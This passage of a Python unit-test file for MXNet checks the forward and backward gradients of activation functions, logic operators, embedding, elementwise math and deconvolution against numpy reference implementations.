data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric-gradient checks for the float16 data type due to precision
# issues; the analytical checks are still performed on each and every data type to verify correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric-gradient checks for the float16 data type due to precision
# issues; the analytical checks are still performed on each and every data type to verify correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
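# Editor's note: an illustrative sketch, not part of the original test suite. The helpers in
# test_gelu implement the tanh approximation
#     gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x**3)))
# which stays very close to the exact form 0.5 * x * (1 + erf(x / sqrt(2))). The hypothetical
# helper below compares the two at a single point, using only numpy and math.
def _gelu_tanh_vs_exact(x):
    tanh_approx = 0.5 * x * (1.0 + np.tanh(0.7978845608028654 * (x + 0.044715 * x ** 3)))
    exact = 0.5 * x * (1.0 + math.erf(x / math.sqrt(2.0)))
    return abs(tanh_approx - exact)
assert _gelu_tanh_vs_exact(0.5) < 1e-3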
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_log_sigmoid():
def flog_sigmoid(a):
return np.log(np.divide(1.0, np.add(1.0, np.exp(-a))))
def flog_sigmoid_grad(a):
return np.divide(1.0, np.add(1.0, np.exp(a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.log_sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = flog_sigmoid(xa)
ya_grad = flog_sigmoid_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_mish():
def fmish(a):
return a * np.tanh(np.log1p(np.exp(a)))
def fmish_grad(a):
softrelu = np.log1p(np.exp(a))
tanh = np.tanh(softrelu)
sigmoid = np.divide(1.0, (1.0 + np.exp(-a)))
return tanh + a * sigmoid * (1.0 - tanh * tanh)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.mish(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fmish(xa)
ya_grad = fmish_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_device(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_device(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_device(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_device(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_device(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_device(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_device(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    # sign() has zero gradient almost everywhere, so the expected input gradient is all zeros
    npout_grad = 0
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_device(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_device(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_device())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_device())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_device(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_device(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_device())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_device())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_device(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_device())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_device(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_device(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
